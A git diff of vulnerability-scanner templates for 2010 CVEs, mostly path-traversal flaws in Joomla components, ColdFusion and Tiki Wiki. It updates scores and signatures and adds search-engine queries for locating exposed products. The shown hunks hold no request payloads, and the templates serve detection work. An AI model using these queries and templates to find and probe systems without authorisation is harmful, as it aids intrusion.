-# digest: 4a0a004730450220671ba5beac4877f63605810ae5ba53e80578909ca33547f5bbc443a22f1920b2022100c4437f0060e149ac837e691a2ee6a12613e7a6ebfe5da8f49b5b52643d78af5c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206a5567b36fff3d03faf770d2c865bf1b403a7b30e0032dfcb49e1553a84bbde4022100f26f6975831ceea1e81e0270b4d70b1ac8619c87910f88580b2df1a75323344c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml
index 58f4abbb84..e7709b2dcc 100644
--- a/http/cves/2010/CVE-2010-1653.yaml
+++ b/http/cves/2010/CVE-2010-1653.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2010-1653
cwe-id: CWE-22
epss-score: 0.03527
- epss-percentile: 0.91355
+ epss-percentile: 0.91571
cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502204ad756a9e16380e027261fee411718753cfd8cbd153d923afa480c57a77e943d022100be3f9d60f33c780dec7263782e438f10d46f59b0c77a82743874dd0e9c03f65f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202e7d67f69fd77bb7216c22fe8676faffb37290acbe3fd550615f33535360ee7102205db0d9e232af3096fb6bc570705058627696924b3e88bd65649940969e1ff061:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml
index 9a911b9473..8a50c2496a 100644
--- a/http/cves/2010/CVE-2010-1657.yaml
+++ b/http/cves/2010/CVE-2010-1657.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2010-1657
cwe-id: CWE-22
epss-score: 0.01751
- epss-percentile: 0.87665
+ epss-percentile: 0.87931
cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100bcb3752f3f8e24379ea159e6831ebe01f2da83a0d58232453372c79b86e08221022100ed629a46f18c172871595fe7120c9aeb0f2441da744b940c59461cde7c96719a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f7d70491dc51a14478a027cf92cee4704418b3b61a36897ba1a3f8ea33bea0df02207acc9a7bd2d035f2e228ed04cf180acadef6a88c222bf92e62cb4b1672822672:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml
index 19d33fcac3..04aec7c37b 100644
--- a/http/cves/2010/CVE-2010-1659.yaml
+++ b/http/cves/2010/CVE-2010-1659.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2010-1659
cwe-id: CWE-22
epss-score: 0.01806
- epss-percentile: 0.86853
+ epss-percentile: 0.88135
cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022044961916a557a8da30cac3ced56cc0b76c6ad56a135ccdeedda4e81e2bfea49e022027e20655fa3d414923eda4d6272299f0f4dd2cef72c8f74d3ba8b462a10c390a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b0d75d2392e79829bfdf92b9806aaffe08721016c29f5e8f84e2cdfbfd700d12022100cdcc663f4843b1ee272e6c689afc5814092e36c1735e11ef0472b89bb472b7c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml
index 91ec26c65c..f4d1851069 100644
--- a/http/cves/2010/CVE-2010-1715.yaml
+++ b/http/cves/2010/CVE-2010-1715.yaml
@@ -12,13 +12,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2010-1715
- http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57677
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2010-1715
cwe-id: CWE-22
epss-score: 0.01242
- epss-percentile: 0.83996
+ epss-percentile: 0.85468
cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -40,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100c47a4bdd67634653ce4da4af40c81205ffdcc542bbe4c92693d10063b0f15a6a02202182f5b7abe3de71edc4955d26840eeaaa624feab87fc896bee09c8bb5f97b8f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a9b34fe0a7da0582ef2dc9ed994e6f7c8805d5e3a7696068a29d89923a913df8022100869ef62055b34cb46a7e175e4df24c22713574e5763d263f77e84f873f33c6d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml
index 709a568761..82e72f9219 100644
--- a/http/cves/2010/CVE-2010-1718.yaml
+++ b/http/cves/2010/CVE-2010-1718.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2010-1718
cwe-id: CWE-22
epss-score: 0.00826
- epss-percentile: 0.81565
+ epss-percentile: 0.8192
cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -39,4 +39,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ecd7446fef1ce54e4f4248ba012aa11ea08e53dd3f5a36fa12d01852d0bf6cd5022100d86f62c4cc116ef4a60241471d37ff8b72ad493ced0d7e6002f1c5ac3db35856:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201dc083bb694abd37e88974641d425a4eaf4eff49cd1a761d702b381aaf4996200220164ea38314a22108dcab83b2524a8f02609d718d0f5541633d753c2dc66ea34c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml
index a0435899d9..dd684fe50d 100644
--- a/http/cves/2010/CVE-2010-1723.yaml
+++ b/http/cves/2010/CVE-2010-1723.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2010-1723
cwe-id: CWE-22
epss-score: 0.01956
- epss-percentile: 0.87487
+ epss-percentile: 0.88678
cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402201f2f6d4b03887f91f05f31e90985ffe041fc19b52146f7a927b36a949b69b27502200af68b38786ac9d14967173b092a4efe378dbf324842eda5736934450c559c42:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022052aabf3c818f63799605eb33167aa840fee9339e6f7a84c0684ed30ea8d352e9022100a66fb820f305c1ebef927eecccd45ce4ad7538e3550cbb860a0e6529cbc86ae5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml
index 64875ad48b..6395aa9c92 100644
--- a/http/cves/2010/CVE-2010-1870.yaml
+++ b/http/cves/2010/CVE-2010-1870.yaml
@@ -27,6 +27,9 @@ info:
max-request: 2
vendor: apache
product: struts
+ shodan-query: http.html:"apache struts"
+ fofa-query: body="struts problem report"
+ google-query: intitle:"struts2 showcase"
tags: cve,cve2010,packetstorm,edb,rce,listserv,ognl,apache
http:
@@ -42,4 +45,4 @@ http:
- 'LISTSERV Maestro\s+[5678]'
- 'Administration Hub 9\.0-[123456780]'
- 'Administration Hub [5678]'
-# digest: 4a0a00473045022009c28af24d49d9f2b2cd719eef0eab59eb17456cc5d44bc1d3fc2767d24ef9c4022100be33c84b0809ba11233918e74323b720e874f8870e0a84637e4a6b55f773050f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e541bad52cababb6cd2cd61c1b26ab8feaae117ccf9c87d10f7c588ca5d3156202204c61984cd595f1fb51216ffaccaa7ca4e2cca292526bf62b42ccb8aaf95821f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml
index bf0c409599..11d0582f50 100644
--- a/http/cves/2010/CVE-2010-1952.yaml
+++ b/http/cves/2010/CVE-2010-1952.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-1952
cwe-id: CWE-22
epss-score: 0.01242
- epss-percentile: 0.85196
+ epss-percentile: 0.85468
cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022061129aea74772e6b2b1371d4e9ba2aa09c9f71d86f09cf33e41a27be90867130022100d2644c5fc639b09a774b82d50f93ec5ca8f39406463ee51c885db6833b1deb61:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e07e1103f68db3c4d774c16b7c2b4fc90547e70e1a8a8a752e6308c0465fc15302202e39e604eb2d895d4825c9de4334dd75c03176b3cdf972c69e7e55e9487083ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml
index 1aa77d90cf..3bee6f3579 100644
--- a/http/cves/2010/CVE-2010-1953.yaml
+++ b/http/cves/2010/CVE-2010-1953.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-1953
cwe-id: CWE-22
epss-score: 0.05684
- epss-percentile: 0.93171
+ epss-percentile: 0.93322
cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022038e7b2689d93babc89559d2862b8bc5b183cad389c6e2fed0700cefd3cf3dfdd022100fd31164f65dbbcb7da90ab8bfdc92b82e66296933e903952cbca8a4182cc9e4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d737f13ca5fc25fe5a00569e47bc39dc8c74c5eb793170039da9d8ddd6470d2f022022d723da6b42ee3de6826045e52db5c95f4d96e596eddfbb0eb73dc0b4bca78b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml
index 7bcf1b5fd8..5c7b96d25e 100644
--- a/http/cves/2010/CVE-2010-1955.yaml
+++ b/http/cves/2010/CVE-2010-1955.yaml
@@ -12,13 +12,14 @@ info:
- https://www.exploit-db.com/exploits/12238
- https://nvd.nist.gov/vuln/detail/CVE-2010-1955
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57846
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2010-1955
cwe-id: CWE-22
epss-score: 0.01671
- epss-percentile: 0.86287
+ epss-percentile: 0.87631
cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -40,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100b23a4aac6fedfb37e15cc43e7f51bf59ba413a099ae58090b05ee9be66d60314022100cfad298dd85b0b1b0cb1046b79e4e8822f005cb18b4081f3c898c3397cdbcc31:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008a8acf3d912e951184f07a48b87c8045691518679ee88020752b9e4dd173a092022100bd260f2ca3cb5ae17b9ccf3bba743bb2963a9fcc9f340e92c95d75d54ae10ea2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml
index 988470fe0d..bdee8941c7 100644
--- a/http/cves/2010/CVE-2010-1956.yaml
+++ b/http/cves/2010/CVE-2010-1956.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-1956
cwe-id: CWE-22
epss-score: 0.06055
- epss-percentile: 0.92761
+ epss-percentile: 0.93494
cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502206e67b1c6317d9843ab60b722ade0f0942e4913d7c3f5630b1c8d19483f638f0c0221009162ad1fcb96f2a504a7f16e9805bc854997ba06eeb3c61adedbf42d4225287e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100858eabd63b6f72843f947e5246274143c6b956b7879d26cbf87d64780ad211df022100c785ac8b95b0a5a99bc41f1ffe795c59c91ba0f621307ff96ab25e35bb5096a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml
index 5b0064eee5..fc61a3a298 100644
--- a/http/cves/2010/CVE-2010-1957.yaml
+++ b/http/cves/2010/CVE-2010-1957.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-1957
cwe-id: CWE-22
epss-score: 0.01671
- epss-percentile: 0.87378
+ epss-percentile: 0.87631
cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100d140e4c1bf958b49625695ac09664cf37de408e74bc9902c319f6646d10d4de2022100e65a364df1072baccbf87a339592e9ecdd95de20e8dd4b705484ea97dafb2f70:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220257730d7812d60cf61ac7279df9ab6ca9bf78181a9c6374ad4d684ad292985da022100d8a43d8b649b8ec95355cb47c4765004ac172a0b0182c730086927f55efcf211:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml
index f94756a8b9..b82676c9f8 100644
--- a/http/cves/2010/CVE-2010-1977.yaml
+++ b/http/cves/2010/CVE-2010-1977.yaml
@@ -11,13 +11,14 @@ info:
reference:
- https://www.exploit-db.com/exploits/12083
- https://nvd.nist.gov/vuln/detail/CVE-2010-1977
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2010-1977
cwe-id: CWE-22
epss-score: 0.00826
- epss-percentile: 0.80059
+ epss-percentile: 0.8192
cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -39,4 +40,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022040f7d241d5e5a884c1963854465cf4831f51f493d326d327351a68621b8ebc3e022100d1c7c3b472c326444bc1b1dd290db71df1dd2cade4f6d02d0d16e10f68ab869b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022050590d4500ed1b763b2bff4f98927178f7e55b44f9a1763caf7f9779d70ffa4c02206df063e8f5d1eebe7a5c628871feeff1823eb31d1b2ba1f3a16634e0e1996343:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml
index 819296c630..75f553daed 100644
--- a/http/cves/2010/CVE-2010-1982.yaml
+++ b/http/cves/2010/CVE-2010-1982.yaml
@@ -18,7 +18,7 @@ info:
cve-id: CVE-2010-1982
cwe-id: CWE-22
epss-score: 0.00477
- epss-percentile: 0.73222
+ epss-percentile: 0.75733
cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -40,4 +40,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221009cbc325331da11e25f4fb8d31fd398ac39f41c26c89d567dfd2945557f4275270220384a57dbc3afa51cbb77526db5c0f891e93a2b9153a342bf1de2ccca20f1d5f2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b86ef37ec2406ebcd7a572475a092ace4af2e4fda2be5426f1f853176f0c643a02206545a885ccc98c24769c1429820ea52fc4fa78a8ea782584bc48106189b76655:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml
index fa16b9b5dc..0bcb0cfb30 100644
--- a/http/cves/2010/CVE-2010-2036.yaml
+++ b/http/cves/2010/CVE-2010-2036.yaml
@@ -18,8 +18,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2010-2036
cwe-id: CWE-22
- epss-score: 0.00718
- epss-percentile: 0.7851
+ epss-score: 0.08973
+ epss-percentile: 0.94583
cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221009a903733a1bc7131d855c5d53d11c378d6476b6e613a596b0e25c59edcfd3f92022100d4bc9343ee7c9595b3e44b08de9ce86a8f2d0af8a44d8483514b8ef8f46c7f94:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009a3b425ae5ec2bbe01c2787c7d7024e0155bdd84568b28dcfa6e1f464a6bbd9902207b990f2ce66a6360bdb52a7cb037367687c2db90c33ab76fcd01adcbc246470a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml
index 52e7647055..4b1000b9e2 100644
--- a/http/cves/2010/CVE-2010-2037.yaml
+++ b/http/cves/2010/CVE-2010-2037.yaml
@@ -18,8 +18,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2010-2037
cwe-id: CWE-22
- epss-score: 0.00718
- epss-percentile: 0.7851
+ epss-score: 0.08973
+ epss-percentile: 0.94583
cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022040f5ddf1305890a721c4c1b8140d7c149c2cd3ce17446937f2471e5bebc466d4022100e8a39a2b4cb386864faa905b2dfb3c53d36c6d18fd9fc211a1e6c2d3c1d221b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ba2f173a61884eb77eca05645e474ea0998974ae81cd2f56a2df04bbad2382af022100a52f1e7d8dd7915e7ae5f9d64e3601969a06347ffbbfe263f7c204d53ffc9512:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml
index 2fafc5155a..c533ba23da 100644
--- a/http/cves/2010/CVE-2010-2050.yaml
+++ b/http/cves/2010/CVE-2010-2050.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-2050
cwe-id: CWE-22
epss-score: 0.03527
- epss-percentile: 0.90637
+ epss-percentile: 0.91571
cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402201528ba80abd9bbc78d30e40e479c27465861d3fa2dd697eb180617ea6e0d81f802202cab5a94649a0d4e9e866b78525516c49a7311601aafcac4bede2efda4bea42a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022072cdaa8c8561d8f802f104a5587be461af0eb4068f8539cb2d673d1e790ae79202205b5ae21b73e9b12635e1776cf8473fec583f1718d6a3bda5b9cc30605ba6b242:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml
index e37ce9a665..c0ebd7fdb7 100644
--- a/http/cves/2010/CVE-2010-2507.yaml
+++ b/http/cves/2010/CVE-2010-2507.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-2507
cwe-id: CWE-22
epss-score: 0.01671
- epss-percentile: 0.87378
+ epss-percentile: 0.87631
cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100b399f4d9dc6b2c952a2ce9e388b0bc21714fffc806c4a6bb3f768981d57139d802206a1974d7ffcd57ea7f9084e535e8f10afddb089fec9a171050d073c28c510db6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d0fbfb8ffd049aeaf94cf869ef1eb3f0f13b0d27229bb4ed42baa7347337b5e702205a316eeb82abfedeb1294c785875852bd9e3bda4b7d2e32bfaa24f9613e36cb8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml
index 99fde06630..0206234511 100644
--- a/http/cves/2010/CVE-2010-2680.yaml
+++ b/http/cves/2010/CVE-2010-2680.yaml
@@ -11,13 +11,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2010-2680
- http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt
- https://exchange.xforce.ibmcloud.com/vulnerabilities/59796
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2010-2680
cwe-id: CWE-22
epss-score: 0.00826
- epss-percentile: 0.80059
+ epss-percentile: 0.8192
cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -39,4 +40,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022072b515f91c496b58e595115b0d084c1aef00d4c6ee17205d003acb4ab43c571302203b36bc9c01b393ef1b59fd113ab4455849196192ef1900eee38d59ce6a1a60a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044021f5ffc7d61e608cca2478cc4115fe3177e5ed61660e8e13424a4c772b685bb9402210087feaeec186288bbbc891fdd5dc0ba7612f5cfd614be5ffac00907ff4670c362:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml
index f89f1e0f29..45c0984796 100644
--- a/http/cves/2010/CVE-2010-2861.yaml
+++ b/http/cves/2010/CVE-2010-2861.yaml
@@ -20,13 +20,15 @@ info:
cve-id: CVE-2010-2861
cwe-id: CWE-22
epss-score: 0.97078
- epss-percentile: 0.99753
+ epss-percentile: 0.9977
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
+ fofa-query: title="coldfusion administrator login"
+ google-query: intitle:"coldfusion administrator login"
tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi
http:
@@ -46,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100fb077ddbfc836210d14e4abbde779e3a4801cadf4c5e57973e1675ae37adab3002200a4dff0b074d16f33db367ba0f8a10fb0b418f6e9bf8cdd4f6036ec6db9d649a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206de44a390dc5302759d12fd4001faad67af1b5043d4e5d5a0e99b24cdc4ee516022100e0df13828777ac09065b161cc832acd8bb8369bef83a8222352647a9b20d5b29:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml
index 1546f38fc8..a2ae05ff6f 100644
--- a/http/cves/2010/CVE-2010-2918.yaml
+++ b/http/cves/2010/CVE-2010-2918.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-2918
cwe-id: CWE-94
epss-score: 0.02847
- epss-percentile: 0.90478
+ epss-percentile: 0.90703
cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502210081baa41c250dff048e922e0bd675a0f66fa65d828db6fd1c6cff4362145b014502207a01230528658a21273d20b9529a24d7cf4f605849cae7697de730852ff82435:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200c91419c3b0dbe4afe3e27b165914d136e3f1855987e5f3f1ddeffe3a0eb6669022100d24948753205fe02e60749f58a0130d1567ccb88505cedee18f474e98e61c8bd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml
index eb6d38cbf0..a3c63c503b 100644
--- a/http/cves/2010/CVE-2010-3203.yaml
+++ b/http/cves/2010/CVE-2010-3203.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 5
cve-id: CVE-2010-3203
cwe-id: CWE-22
- epss-score: 0.00626
- epss-percentile: 0.76748
+ epss-score: 0.02682
+ epss-percentile: 0.90436
cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022030007981511407dd6716097c70d2348b6e7f288e57d05a177e4f9ae0bcf607ef022100aa3436a7609d718ca4639083c1b39f8585519a8c27fd56f228a6af4a2cc3eedf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210086161433d96dea0abbb2460f498faec5e7cc9dc2dac4ae9051982a2ce801d084022016b89bbd96b6df1b01c5144b1077770507e9b836e89044fd5c992e1586fb99df:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml
index 85c0b4a3a6..4e77e67d8c 100644
--- a/http/cves/2010/CVE-2010-4231.yaml
+++ b/http/cves/2010/CVE-2010-4231.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-4231
cwe-id: CWE-22
epss-score: 0.01615
- epss-percentile: 0.87178
+ epss-percentile: 0.87445
cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f3c7c9347f9d8a8e7b83098897aecc1fc6ca5594a43e83505cd43fdd025d6130022100832745cf9064f1897cb80f0caceac6dfa4b448f2bae9f8ca58b1b79ac602e833:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ef798e04d208e6c7944c2de7bd37f63fcc958b0834ef7b0cf0a355a7b866fb15022100c6442d68055cef043c33708877f3fc2667950bb0befd604648e255086d34cac7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml
index 7f6b76880d..d71ca59e98 100644
--- a/http/cves/2010/CVE-2010-4239.yaml
+++ b/http/cves/2010/CVE-2010-4239.yaml
@@ -20,13 +20,15 @@ info:
cvss-score: 9.8
cve-id: CVE-2010-4239
cwe-id: CWE-20
- epss-score: 0.03038
- epss-percentile: 0.90751
+ epss-score: 0.02675
+ epss-percentile: 0.90421
cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: tiki
product: tikiwiki_cms\/groupware
+ shodan-query: http.html:"tiki wiki"
+ fofa-query: body="tiki wiki"
tags: cve,cve2010,tikiwiki,lfi,tiki
http:
@@ -42,4 +44,4 @@ http:
- "fonts"
- "extensions"
condition: and
-# digest: 4a0a00473045022100b5b334a2fec00cf5a3aecc1339951bf57de03095d5f4265c23450b3a0c64bb5c02206338a21c9a89350f86820ccc9f08c7d37697834a200669fe085df7763d730318:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d07eddfe6076e3294489122182c54098fc31dc93dfaf0cec95d3140d24aef9800220022764390a506aceb2b9b5bdcc58ada9c586462bf262e0c7d332e98fe5807db4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml
index 4feec95d93..1e44a108c0 100644
--- a/http/cves/2010/CVE-2010-4282.yaml
+++ b/http/cves/2010/CVE-2010-4282.yaml
@@ -26,6 +26,9 @@ info:
max-request: 1
vendor: artica
product: pandora_fms
+ shodan-query: http.title:"pandora fms"
+ fofa-query: title="pandora fms"
+ google-query: intitle:"pandora fms"
tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica
http:
